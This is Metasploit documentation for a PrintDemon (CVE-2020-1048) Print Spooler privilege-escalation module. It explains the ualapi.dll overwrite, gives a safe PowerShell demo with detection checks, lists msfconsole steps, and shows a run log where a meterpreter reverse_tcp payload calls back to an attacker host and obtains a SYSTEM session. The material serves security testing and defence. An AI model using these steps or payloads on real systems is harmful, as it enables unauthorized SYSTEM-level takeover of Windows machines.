metasploit-gs/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md
## Vulnerable Application

Vulnerable versions for this exploit: all unpatched Windows releases up to and
including version 2003 (the scenario below was tested on Windows 10 1903,
build 18362).
### Introduction

This exploit relies on a bug in the Print Spooler service: a user can create a
virtual printer whose port is a file path, and jobs sent to that printer are
written by the spooler, which runs as `SYSTEM`, to trusted locations on the
filesystem. If the user keeps the default overwrite target, it may create a
permanent backdoor.

The exploit creates a print job that writes to a trusted location. By selecting
`C:\windows\system32\ualapi.dll` we abuse the spooler service twice: the
spooler writes the job to that path when it restarts, then loads the DLL into
itself when it restarts a second time. The DLL is then running as `SYSTEM`.

When the printer is created, the target shows a pop-up saying a printer was
created.

A larger issue is that the Spooler service does not like to stop. `sc stop
Spooler` does not stop it. Killing the PID from a trusted process kills it,
but it restarts automatically. Using the `PendingFileRenameOperations`
registry key to swap the file in also does not appear to work, which is why
the module relies on rebooting the target instead.
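The primitive described above, as an added example that is not the module's own code: a file-backed printer port is created against a harmless path under `%TEMP%` rather than `System32`, a job is sent through it, and the two checks a defender would run afterwards are shown (printer ports whose name is a drive-letter path, and the state of `ualapi.dll`). The printer name, driver name, target path and function names are this example's own choices. It assumes Windows PowerShell 5.1 with the `PrintManagement` module (Windows 8 / Server 2012 and later) and an elevated prompt for the port and printer creation.

```powershell
#Requires -Modules PrintManagement
# Added example, not the module's code. Names and paths below are assumptions.

# --- 1. The primitive: a virtual printer whose port is a file path ----------
# The Local Port monitor treats a port name that looks like a path as a file to
# write, and the spooler does the write in its own (SYSTEM) context. The module
# aims this at C:\Windows\System32\ualapi.dll; this demo uses a temp file so it
# is safe to run. If the write fails at job time, the job stays spooled and is
# retried when the spooler starts, which is the "restart" step the page describes.
function New-FileBackedPrinter {
    param(
        [string]$PrinterName = 'PrintDemonDemo',
        [string]$TargetPath  = (Join-Path $env:TEMP 'printdemon_demo.txt'),
        [string]$DriverName  = 'Generic / Text Only'   # inbox driver on supported Windows
    )
    Add-PrinterPort -Name $TargetPath
    Add-Printer -Name $PrinterName -DriverName $DriverName -PortName $TargetPath
    return $TargetPath
}

function Send-TestJob {
    param([string]$PrinterName = 'PrintDemonDemo')
    # A real exploit sends DLL bytes; this is a constructed plain-text job.
    'constructed sample job from the added example' | Out-Printer -Name $PrinterName
}

function Remove-FileBackedPrinter {
    param(
        [string]$PrinterName = 'PrintDemonDemo',
        [string]$TargetPath  = (Join-Path $env:TEMP 'printdemon_demo.txt')
    )
    Remove-Printer -Name $PrinterName -ErrorAction SilentlyContinue
    Remove-PrinterPort -Name $TargetPath -ErrorAction SilentlyContinue
    Remove-Item $TargetPath -ErrorAction SilentlyContinue
}

# --- 2. The checks ----------------------------------------------------------
# Built-in ports are LPT1:, COM1:, FILE:, nul:, PORTPROMPT:, SHRFAX: and so on.
# A port whose name is a drive-letter path is rarely legitimate, and one under
# %WINDIR% is the pattern this module leaves behind.
function Find-FilePathPrinterPorts {
    $printers = Get-Printer
    Get-PrinterPort |
        Where-Object { $_.Name -match '^[A-Za-z]:\\' } |
        ForEach-Object {
            $port = $_.Name
            [pscustomobject]@{
                Port        = $port
                UnderWinDir = $port.StartsWith($env:WINDIR, [StringComparison]::OrdinalIgnoreCase)
                Printers    = ($printers | Where-Object PortName -eq $port |
                               Select-Object -ExpandProperty Name) -join ', '
            }
        }
}

# ualapi.dll is not present on client SKUs, so its presence in System32 is a
# finding; where it ships legitimately (User Access Logging on server SKUs)
# the Authenticode status separates the Microsoft binary from a dropped payload.
function Test-UalapiDll {
    $dll = Join-Path $env:WINDIR 'System32\ualapi.dll'
    if (-not (Test-Path $dll)) {
        return [pscustomobject]@{ Path = $dll; Present = $false }
    }
    $sig = Get-AuthenticodeSignature -FilePath $dll
    [pscustomobject]@{
        Path      = $dll
        Present   = $true
        Signature = $sig.Status      # 'Valid' for a Microsoft binary, 'NotSigned' for a payload
        Signer    = $sig.SignerCertificate.Subject
        Written   = (Get-Item $dll).LastWriteTime
    }
}

# Usage (elevated):
#   $path = New-FileBackedPrinter
#   Send-TestJob
#   Get-Content $path            # the job reached disk through the spooler
#   Find-FilePathPrinterPorts    # flags the demo port; on a victim, the ualapi.dll port
#   Test-UalapiDll
#   Remove-FileBackedPrinter
```

`Find-FilePathPrinterPorts` is the check worth scheduling: the port survives the reboots, so it is still visible after the payload DLL has been loaded and the printer pop-up has long been dismissed.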
## Verification Steps

1. Start `msfconsole`
2. Get a session on an unpatched Windows target (version <= 2003)
3. `use exploit/windows/local/cve_2020_1048_printerdemon`
4. `set session <session>`
5. `set payload <payload>`
6. `set lhost <lhost>`
7. `set lport <lport>`
8. `run`
9. Verify the target reboots automatically if `RESTART_TARGET` is `true` (the
   default); this first reboot performs the overwrite and you lose your session
10. Reboot the target again (yes, it has to reboot twice); the second reboot
    loads the DLL
11. Verify you get a new session as `NT AUTHORITY\SYSTEM`
## Options

**EXECUTE_DELAY**

The number of seconds between uploading the exploit and running it. Default is
3 seconds, but high-latency networks may require more time.

**EXPLOIT_NAME**

The filename of the exploit binary when it is uploaded to the target (`%RAND%`
by default).

**EXPLOIT_DIR**

Directory to use for file upload and linking; this should not already exist
(`%RAND%` by default).

**OVERWRITE_DLL**

The remote file to write to. Default is `%WINDIR%\system32\ualapi.dll`
(`C:\windows\system32\ualapi.dll` on a standard install).

**PAYLOAD_NAME**

The filename of the payload DLL when it is uploaded to the remote host
(`%RAND%.dll` by default).

**RESTART_TARGET**

Restart the target after the exploit runs to force the overwrite (`true` by
default). YOU WILL LOSE YOUR SESSION unless you have a method of persistence.
The DLL will not be run until a second reboot.

**WRITABLE_DIR**

The directory into which the exploit binary and the payload DLL are uploaded
(`%TEMP%` by default).
## Scenarios

### Tested on Windows 10 x64 release 1903
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
[*] Started reverse TCP handler on 192.168.135.197:5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options
Module options (exploit/windows/local/cve_2020_1048_printerdemon):
Name Current Setting Required Description
---- --------------- -------- -----------
EXECUTE_DELAY 3 yes The number of seconds to delay between file upload and exploit launch
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
OVERWRITE_DLL no Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
PAYLOAD_NAME no The filename for the payload to be used on the target host (%RAND%.dll by default).
RESTART_TARGET true yes Restart the target after exploit (you will lose your session until a second reboot).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Path to write binaries (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.197 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
[*] Started reverse TCP handler on 192.168.135.197:4444
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
[*] Build Number = 18362
[*] Uploading Payload
[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[*] Sleeping for 3 seconds before launching exploit
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Running Exploit
[*] Exploit output:
Printer created successfully
[*] Rebooting DESKTOP-CL5L2IH
[*] 192.168.132.134 - Meterpreter session 2 closed. Reason: Died
```
After the automatic reboot, reboot the target again. The first reboot performs
the overwrite; the second loads the DLL and returns a `SYSTEM` session to the
handler started above:
```
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```